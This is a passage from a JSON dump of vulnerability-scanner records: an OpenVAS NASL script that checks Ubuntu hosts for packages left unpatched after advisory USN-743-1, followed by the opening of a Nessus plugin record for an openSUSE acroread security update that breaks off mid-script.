vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:29:18", "bulletinFamily": "scanner", "description": "The remote host is missing an update to gs-gpl\nannounced via advisory USN-743-1.", "modified": "2017-12-01T00:00:00", "published": "2009-06-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64169", "id": "OPENVAS:64169", "title": "Ubuntu USN-743-1 (gs-gpl)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_743_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_743_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-743-1 (gs-gpl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n gs-gpl 8.15-4ubuntu3.2\n\nUbuntu 7.10:\n libgs8 8.61.dfsg.1~svn8187-0ubuntu3.5\n\nUbuntu 8.04 LTS:\n libgs8 8.61.dfsg.1-1ubuntu3.1\n\nUbuntu 8.10:\n libgs8 8.63.dfsg.1-0ubuntu6.3\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-743-1\";\n\ntag_insight = \"It was discovered that Ghostscript contained multiple integer overflows in\nits ICC color management library. If a user or automated system were\ntricked into opening a crafted Postscript file, an attacker could cause a\ndenial of service or execute arbitrary code with privileges of the user\ninvoking the program. (CVE-2009-0583)\n\nIt was discovered that Ghostscript did not properly perform bounds checking\nin its ICC color management library. If a user or automated system were\ntricked into opening a crafted Postscript file, an attacker could cause a\ndenial of service or execute arbitrary code with privileges of the user\ninvoking the program. (CVE-2009-0584)\";\ntag_summary = \"The remote host is missing an update to gs-gpl\nannounced via advisory USN-743-1.\";\n\n \n\n\nif(description)\n{\n script_id(64169);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-0583\", \"CVE-2009-0584\", \"CVE-2009-0581\", \"CVE-2009-0723\", \"CVE-2009-0733\", \"CVE-2009-0920\", \"CVE-2009-0921\", \"CVE-2009-0927\", \"CVE-2009-0207\", \"CVE-2009-0928\", \"CVE-2009-0193\", \"CVE-2009-0629\", \"CVE-2009-0626\", \"CVE-2009-0628\", \"CVE-2009-0635\", \"CVE-2009-0633\", \"CVE-2009-0634\", \"CVE-2009-0637\", \"CVE-2009-0784\", \"CVE-2009-0698\", \"CVE-2008-5239\", \"CVE-2008-1036\", \"CVE-2008-4316\", \"CVE-2006-2426\", \"CVE-2009-1093\", \"CVE-2009-1094\", \"CVE-2009-1095\", \"CVE-2009-1096\", \"CVE-2009-1097\", \"CVE-2009-1098\", \"CVE-2009-1100\", \"CVE-2009-1101\", \"CVE-2009-1102\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-743-1 (gs-gpl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-743-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.15-4ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.15-4ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-doc\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp-x\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-esp-dev\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-aladdin\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-common\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-x\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-dev\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs8\", ver:\"8.61.dfsg.1~svn8187-0ubuntu3.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-doc\", ver:\"8.61.dfsg.1-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.61.dfsg.1-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.61.dfsg.1-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-esp-dev\", ver:\"8.61.dfsg.1-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-aladdin\", ver:\"8.61.dfsg.1-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-common\", ver:\"8.61.dfsg.1-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp-x\", ver:\"8.61.dfsg.1-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.61.dfsg.1-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-x\", ver:\"8.61.dfsg.1-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"8.61.dfsg.1-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-dev\", ver:\"8.61.dfsg.1-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs8\", ver:\"8.61.dfsg.1-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-doc\", ver:\"8.63.dfsg.1-0ubuntu6.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-common\", ver:\"8.63.dfsg.1-0ubuntu6.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-gpl\", ver:\"8.63.dfsg.1-0ubuntu6.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs\", ver:\"8.63.dfsg.1-0ubuntu6.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-esp-dev\", ver:\"8.63.dfsg.1-0ubuntu6.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-aladdin\", ver:\"8.63.dfsg.1-0ubuntu6.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp-x\", ver:\"8.63.dfsg.1-0ubuntu6.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gs-esp\", ver:\"8.63.dfsg.1-0ubuntu6.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript-x\", ver:\"8.63.dfsg.1-0ubuntu6.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"8.63.dfsg.1-0ubuntu6.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs-dev\", ver:\"8.63.dfsg.1-0ubuntu6.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgs8\", ver:\"8.63.dfsg.1-0ubuntu6.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1-dev\", ver:\"1.13-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1\", ver:\"1.13-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms-utils\", ver:\"1.13-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1-dev\", ver:\"1.16-5ubuntu3.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1\", ver:\"1.16-5ubuntu3.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms-utils\", ver:\"1.16-5ubuntu3.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-liblcms\", ver:\"1.16-5ubuntu3.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1-dev\", ver:\"1.16-7ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1\", ver:\"1.16-7ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms-utils\", ver:\"1.16-7ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-liblcms\", ver:\"1.16-7ubuntu1.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1-dev\", ver:\"1.17.dfsg-1+lenny2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms1\", ver:\"1.17.dfsg-1+lenny2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblcms-utils\", ver:\"1.17.dfsg-1+lenny2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-liblcms\", ver:\"1.17.dfsg-1+lenny2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemtap\", ver:\"0.0.20080705-1+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.1+ubuntu2-7.11\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-main1\", ver:\"1.1.1+ubuntu2-7.11\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-doc\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-plugins\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-dbg\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-console\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-ffmpeg\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-gnome\", ver:\"1.1.7-1ubuntu1.5\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-doc\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-all-plugins\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-plugins\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-bin\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-console\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-dbg\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-misc-plugins\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-x\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-ffmpeg\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-gnome\", ver:\"1.1.11.1-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-doc\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-all-plugins\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-plugins\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-bin\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-console\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-dbg\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-ffmpeg\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-gnome\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-misc-plugins\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-x\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1\", ver:\"1.1.15-0ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icu-doc\", ver:\"3.4.1a-1ubuntu1.6.06.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu34-dev\", ver:\"3.4.1a-1ubuntu1.6.06.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu34\", ver:\"3.4.1a-1ubuntu1.6.06.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icu-doc\", ver:\"3.6-3ubuntu0.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu36-dev\", ver:\"3.6-3ubuntu0.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu36\", ver:\"3.6-3ubuntu0.2\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icu-doc\", ver:\"3.8-6ubuntu0.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lib32icu-dev\", ver:\"3.8-6ubuntu0.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lib32icu38\", ver:\"3.8-6ubuntu0.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu-dev\", ver:\"3.8-6ubuntu0.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu38-dbg\", ver:\"3.8-6ubuntu0.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu38\", ver:\"3.8-6ubuntu0.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icu-doc\", ver:\"3.8.1-2ubuntu0.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lib32icu-dev\", ver:\"3.8.1-2ubuntu0.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lib32icu38\", ver:\"3.8.1-2ubuntu0.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu-dev\", ver:\"3.8.1-2ubuntu0.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu38-dbg\", ver:\"3.8.1-2ubuntu0.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libicu38\", ver:\"3.8.1-2ubuntu0.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-doc\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-source\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-source-files\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedtea6-plugin\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-dbg\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-demo\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-jdk\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b12-0ubuntu6.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-03T12:17:26", "bulletinFamily": "scanner", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_1_ACROREAD-090325.NASL", "href": "https://www.tenable.com/plugins/nessus/40182", "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : acroread (acroread-689)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-689.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40182);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/10/25 13:36:34\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-689)\");\n script_summary(english:\"Check for the acroread-689 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=488619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = 